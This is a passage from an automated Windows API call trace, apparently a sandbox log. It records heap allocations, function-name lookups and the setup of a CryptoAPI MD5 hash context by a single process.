hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0137.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0137.536] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0137.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0137.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0137.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0137.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0137.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a68 [0137.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0137.537] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0137.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0137.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0137.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0137.537] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0137.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0137.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0137.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0137.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0137.540] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0137.540] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.540] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0137.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0137.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0137.540] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0137.540] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0137.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.540] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0137.541] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0137.541] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0137.541] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0137.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0137.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0137.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0137.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0137.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0137.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0137.542] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0137.542] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0137.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0137.543] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.543] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.543] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0137.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0137.543] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.543] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0137.543] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.543] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0137.543] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0137.543] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.543] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0137.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0137.544] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0137.544] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0137.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0137.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e509f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0137.544] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0137.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0137.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0137.545] HeapFree (in: 